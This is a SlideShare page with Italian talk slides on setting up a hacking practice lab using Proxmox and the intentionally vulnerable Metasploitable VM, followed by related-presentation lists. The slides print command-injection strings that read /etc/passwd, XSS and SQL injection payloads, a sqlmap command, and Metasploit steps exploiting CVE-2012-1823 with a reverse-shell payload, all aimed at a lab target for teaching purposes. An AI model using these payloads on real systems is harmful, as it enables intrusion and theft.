SlideShare a Scribd company logo
Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
HACKING LAB
con ProxMox e Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
$ whoami
Phishing Analysis and Contrast @ D3Lab
Team Member @ BackBox Linux
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Hacking Lab
Un laboratorio nella propria infrastruttura di rete per allenarsi
in assoluta legalità sulle tecniche sfruttate nel Hacking.
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
ProxMox
Proxmox VE is a complete open source server virtualization
management software. It is based on KVM virtualization and
container-based virtualization and manages KVM virtual
machines, Linux containers (LXC), storage, virtualized
networks, and HA clusters
www.proxmox.com
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Metasploitable
Metasploitable is an intentionally vulnerable Linux virtual
machine. This VM can be used to conduct security training,
test security tools, and practice common penetration testing
techniques.
https://sourceforge.net/projects/metasploitable/
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
BackBox is a penetration test and security assessment
oriented Ubuntu-based Linux distribution providing a network
and informatic systems analysis toolkit. BackBox desktop
environment includes a complete set of tools required for
ethical hacking and security testing.
BackBox Linux
backbox.org
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
Creiamo una nuova Macchina Virtuale dal Pannello Web
Ricordatevelo
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
$ ssh root@IP_PROXMOX
# cd /var/lib/vz/images

# mkdir 102 (ID del VM che abbiamo prima creato)
# cd 102

# wget http://bit.ly/metasploitable -O metasploitable.zip

# unzip metasploitable.zip
# cd Metasploitable2-Linux/
# mv Metasploitable.vmdk ../
# rm metasploitable.zip ./Metasploitable2-Linux/ -rf
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
# qemu-img convert -f vmdk Metasploitable.vmdk -O qcow2
…Metasploitable.qcow2
# nano /etc/pve/qemu-server/102.conf
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
bootdisk: ide0
ide0: file=local:102/Metasploitable.qcow2,size=8G
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
Avviamo la VM
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
https://youtu.be/WBsCOjRQKnI
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: nmap
$ nmap 192.168.x.x
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.2.128
Host is up (0.0071s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: nmap
$ sudo nmap -o 192.168.x.x
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.2.128
Host is up (0.0071s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
…
…
…
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.24 - 2.6.25
Network Distance: 2 hops
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Zenmap
$ sudo zenmap
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Dirsearch
$ dirsearch -e php -u http://192.168.x.x
[22:30:01] 200 - 112KB - /doc/
[22:30:01] 302 - 0B - /dvwa/ -> login.php
[22:30:03] 200 - 891B - /index.php
[22:30:05] 200 - 24KB - /mutillidae/
[22:30:05] 200 - 4KB - /phpMyAdmin/
[22:30:06] 200 - 48KB - /phpinfo.php
[22:30:07] 403 - 300B - /server-status/
[22:30:08] 200 - 884B - /test/
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA
http://192.168.x.x/dvwa/ admin:password
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA Command Execution Low
192.168.2.1 ; cat /etc/passwd
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA Command Execution Medium
192.168.2.1 & cat /etc/passwd
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Reflected Low
<script>alert('Hello World')</script>
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Reflected Medium
<ScRiPt>alert('Hello World’)</script>
<script language="javascript">alert('Hello World’)</script>
<img src=x onerror="alert('Hello World')">
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Stored Low
<script>document.write(document.cookie)</script>
<iframe src=“http://www.makerstation.it/"></iframe>
<meta http-equiv="refresh" content="10; url=http://
www.makerstation.it/">
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Stored Medium
<ScRiPt>alert("Hello World 2")</script>
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA SQL Injection Low
' or '0'='0
' or '0'='0' union select null, version() #
' or '0'='0' union select null, database() #
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA SQL Injection Low and SQLMap
sqlmap -u "http://192.168.x.x/dvwa/vulnerabilities/sqli/" --
forms --cookie="security=low; PHPSESSID=xyz"
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA SQL Injection Medium
0 or 1=1
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Whatweb
$ whatweb 192.168.x.x
[200] Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8
(Ubuntu) DAV/2], IP[192.168.x.x], PHP[5.2.4-2ubuntu5.10],
Title[Metasploitable2 - Linux], WebDAV[2], X-Powered-
By[PHP/5.2.4-2ubuntu5.10]
$ nmap -sV --script=http-php-version 192.168.x.x
|_Version from header x-powered-by: PHP/5.2.4-2
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Metasploit
$ sudo metasploit
# search CVE-2012-1823
# use exploit/multi/http/php_cgi_arg_injection
# show options
# set RHOST 192.168.x.x

# set PAYLOAD php/meterpreter/reverse_tcp
# exploit
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Armitage
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Q&A
@AndreaDraghetti

More Related Content

What's hot

Drive into calico architecture
Drive into calico architectureDrive into calico architecture
Drive into calico architecture
Anirban Sen Chowdhary
 
Room 1 - 6 - Trần Quốc Sang - Autoscaling for multi cloud platform based on S...
Room 1 - 6 - Trần Quốc Sang - Autoscaling for multi cloud platform based on S...Room 1 - 6 - Trần Quốc Sang - Autoscaling for multi cloud platform based on S...
Room 1 - 6 - Trần Quốc Sang - Autoscaling for multi cloud platform based on S...
Vietnam Open Infrastructure User Group
 
오픈스택 기반 클라우드 서비스 구축 방안 및 사례
오픈스택 기반 클라우드 서비스 구축 방안 및 사례오픈스택 기반 클라우드 서비스 구축 방안 및 사례
오픈스택 기반 클라우드 서비스 구축 방안 및 사례
SONG INSEOB
 
이벤트 기반 분산 시스템을 향한 여정
이벤트 기반 분산 시스템을 향한 여정이벤트 기반 분산 시스템을 향한 여정
이벤트 기반 분산 시스템을 향한 여정
Arawn Park
 
Overview of secret management solutions and architecture
Overview of secret management solutions and architectureOverview of secret management solutions and architecture
Overview of secret management solutions and architecture
Yuechuan (Mike) Chen
 
Using Vault to decouple MySQL Secrets
Using Vault to decouple MySQL SecretsUsing Vault to decouple MySQL Secrets
Using Vault to decouple MySQL Secrets
Derek Downey
 
Owasp zap
Owasp zapOwasp zap
Kong API Gateway
Kong API Gateway Kong API Gateway
Kong API Gateway
Chris Mague
 
Nginx
NginxNginx
Hashicorp Vault ppt
Hashicorp Vault pptHashicorp Vault ppt
Hashicorp Vault ppt
Shrey Agarwal
 
Introduction to Vault
Introduction to VaultIntroduction to Vault
Introduction to Vault
Knoldus Inc.
 
VictoriaLogs: Open Source Log Management System - Preview
VictoriaLogs: Open Source Log Management System - PreviewVictoriaLogs: Open Source Log Management System - Preview
VictoriaLogs: Open Source Log Management System - Preview
VictoriaMetrics
 
How VXLAN works on Linux
How VXLAN works on LinuxHow VXLAN works on Linux
How VXLAN works on Linux
Etsuji Nakai
 
Secret Management with Hashicorp’s Vault
Secret Management with Hashicorp’s VaultSecret Management with Hashicorp’s Vault
Secret Management with Hashicorp’s Vault
AWS Germany
 
Get Hands-On with NGINX and QUIC+HTTP/3
Get Hands-On with NGINX and QUIC+HTTP/3Get Hands-On with NGINX and QUIC+HTTP/3
Get Hands-On with NGINX and QUIC+HTTP/3
NGINX, Inc.
 
The Basic Introduction of Open vSwitch
The Basic Introduction of Open vSwitchThe Basic Introduction of Open vSwitch
The Basic Introduction of Open vSwitch
Te-Yen Liu
 
Elastic-Engineering
Elastic-EngineeringElastic-Engineering
Elastic-Engineering
Araf Karsh Hamid
 
Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming
Cloudflare
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and more
Brendan Gregg
 
[오픈소스컨설팅] 서비스 메쉬(Service mesh)
[오픈소스컨설팅] 서비스 메쉬(Service mesh)[오픈소스컨설팅] 서비스 메쉬(Service mesh)
[오픈소스컨설팅] 서비스 메쉬(Service mesh)
Open Source Consulting
 

What's hot (20)

Drive into calico architecture
Drive into calico architectureDrive into calico architecture
Drive into calico architecture
 
Room 1 - 6 - Trần Quốc Sang - Autoscaling for multi cloud platform based on S...
Room 1 - 6 - Trần Quốc Sang - Autoscaling for multi cloud platform based on S...Room 1 - 6 - Trần Quốc Sang - Autoscaling for multi cloud platform based on S...
Room 1 - 6 - Trần Quốc Sang - Autoscaling for multi cloud platform based on S...
 
오픈스택 기반 클라우드 서비스 구축 방안 및 사례
오픈스택 기반 클라우드 서비스 구축 방안 및 사례오픈스택 기반 클라우드 서비스 구축 방안 및 사례
오픈스택 기반 클라우드 서비스 구축 방안 및 사례
 
이벤트 기반 분산 시스템을 향한 여정
이벤트 기반 분산 시스템을 향한 여정이벤트 기반 분산 시스템을 향한 여정
이벤트 기반 분산 시스템을 향한 여정
 
Overview of secret management solutions and architecture
Overview of secret management solutions and architectureOverview of secret management solutions and architecture
Overview of secret management solutions and architecture
 
Using Vault to decouple MySQL Secrets
Using Vault to decouple MySQL SecretsUsing Vault to decouple MySQL Secrets
Using Vault to decouple MySQL Secrets
 
Owasp zap
Owasp zapOwasp zap
Owasp zap
 
Kong API Gateway
Kong API Gateway Kong API Gateway
Kong API Gateway
 
Nginx
NginxNginx
Nginx
 
Hashicorp Vault ppt
Hashicorp Vault pptHashicorp Vault ppt
Hashicorp Vault ppt
 
Introduction to Vault
Introduction to VaultIntroduction to Vault
Introduction to Vault
 
VictoriaLogs: Open Source Log Management System - Preview
VictoriaLogs: Open Source Log Management System - PreviewVictoriaLogs: Open Source Log Management System - Preview
VictoriaLogs: Open Source Log Management System - Preview
 
How VXLAN works on Linux
How VXLAN works on LinuxHow VXLAN works on Linux
How VXLAN works on Linux
 
Secret Management with Hashicorp’s Vault
Secret Management with Hashicorp’s VaultSecret Management with Hashicorp’s Vault
Secret Management with Hashicorp’s Vault
 
Get Hands-On with NGINX and QUIC+HTTP/3
Get Hands-On with NGINX and QUIC+HTTP/3Get Hands-On with NGINX and QUIC+HTTP/3
Get Hands-On with NGINX and QUIC+HTTP/3
 
The Basic Introduction of Open vSwitch
The Basic Introduction of Open vSwitchThe Basic Introduction of Open vSwitch
The Basic Introduction of Open vSwitch
 
Elastic-Engineering
Elastic-EngineeringElastic-Engineering
Elastic-Engineering
 
Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and more
 
[오픈소스컨설팅] 서비스 메쉬(Service mesh)
[오픈소스컨설팅] 서비스 메쉬(Service mesh)[오픈소스컨설팅] 서비스 메쉬(Service mesh)
[오픈소스컨설팅] 서비스 메쉬(Service mesh)
 

Similar to Hacking Lab con ProxMox e Metasploitable

Mininet Basics
Mininet BasicsMininet Basics
Mininet Basics
Eueung Mulyana
 
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Atlassian
 
How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...
Saroj Sahu
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
 
Building and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and MarathonBuilding and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and Marathon
Julia Mateo
 
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Zabbix
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
NoSuchCon
 
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
faker1842002
 
Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)
Igalia
 
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
Tokyo University of Science
 
Python And My Sq Ldb Module
Python And My Sq Ldb ModulePython And My Sq Ldb Module
Python And My Sq Ldb Module
AkramWaseem
 
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with UciprovLukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Zabbix
 
Great Hiroshima with Python 170830
Great Hiroshima with Python 170830Great Hiroshima with Python 170830
Great Hiroshima with Python 170830
Takuya Nishimoto
 
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea LuzzardiWhat's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
Mike Goelzer
 
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea LuzzardiWhat's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
Docker, Inc.
 
Lightweight APIs in mRuby
Lightweight APIs in mRubyLightweight APIs in mRuby
Lightweight APIs in mRuby
Pivorak MeetUp
 
Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp
Ana Medina
 
Data Hiding Techniques
Data Hiding TechniquesData Hiding Techniques
Data Hiding Techniques
prashant3535
 
DDEV - Extended
DDEV - ExtendedDDEV - Extended
DDEV - Extended
Christian Münch
 
MySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to ImplementationMySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to Implementation
Ronald Bradford
 

Similar to Hacking Lab con ProxMox e Metasploitable (20)

Mininet Basics
Mininet BasicsMininet Basics
Mininet Basics
 
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
 
How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Building and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and MarathonBuilding and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and Marathon
 
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
 
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
 
Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)
 
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
 
Python And My Sq Ldb Module
Python And My Sq Ldb ModulePython And My Sq Ldb Module
Python And My Sq Ldb Module
 
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with UciprovLukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
 
Great Hiroshima with Python 170830
Great Hiroshima with Python 170830Great Hiroshima with Python 170830
Great Hiroshima with Python 170830
 
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea LuzzardiWhat's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
 
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea LuzzardiWhat's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
 
Lightweight APIs in mRuby
Lightweight APIs in mRubyLightweight APIs in mRuby
Lightweight APIs in mRuby
 
Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp
 
Data Hiding Techniques
Data Hiding TechniquesData Hiding Techniques
Data Hiding Techniques
 
DDEV - Extended
DDEV - ExtendedDDEV - Extended
DDEV - Extended
 
MySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to ImplementationMySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to Implementation
 

More from Andrea Draghetti

Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureFrodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisure
Andrea Draghetti
 
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzionePhishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzione
Andrea Draghetti
 
Gophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingGophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishing
Andrea Draghetti
 
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Andrea Draghetti
 
Let’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsLet’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklists
Andrea Draghetti
 
Cyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneCyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusione
Andrea Draghetti
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e Sicurezza
Andrea Draghetti
 
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariPi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Andrea Draghetti
 
Errori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoErrori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativo
Andrea Draghetti
 
Phishing: One Shot Many Victims
Phishing: One Shot Many VictimsPhishing: One Shot Many Victims
Phishing: One Shot Many Victims
Andrea Draghetti
 
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e Contromisure
Andrea Draghetti
 
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016
Andrea Draghetti
 
BackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTFBackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTF
Andrea Draghetti
 
BackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestBackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration Test
Andrea Draghetti
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
Andrea Draghetti
 
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshockBackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
Andrea Draghetti
 
BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!
Andrea Draghetti
 
BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!
Andrea Draghetti
 
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFiLinux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Andrea Draghetti
 

More from Andrea Draghetti (19)

Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureFrodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisure
 
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzionePhishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzione
 
Gophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingGophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishing
 
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
 
Let’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsLet’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklists
 
Cyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneCyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusione
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e Sicurezza
 
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariPi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
 
Errori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoErrori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativo
 
Phishing: One Shot Many Victims
Phishing: One Shot Many VictimsPhishing: One Shot Many Victims
Phishing: One Shot Many Victims
 
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e Contromisure
 
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016
 
BackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTFBackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTF
 
BackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestBackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration Test
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
 
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshockBackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
 
BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!
 
BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!
 
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
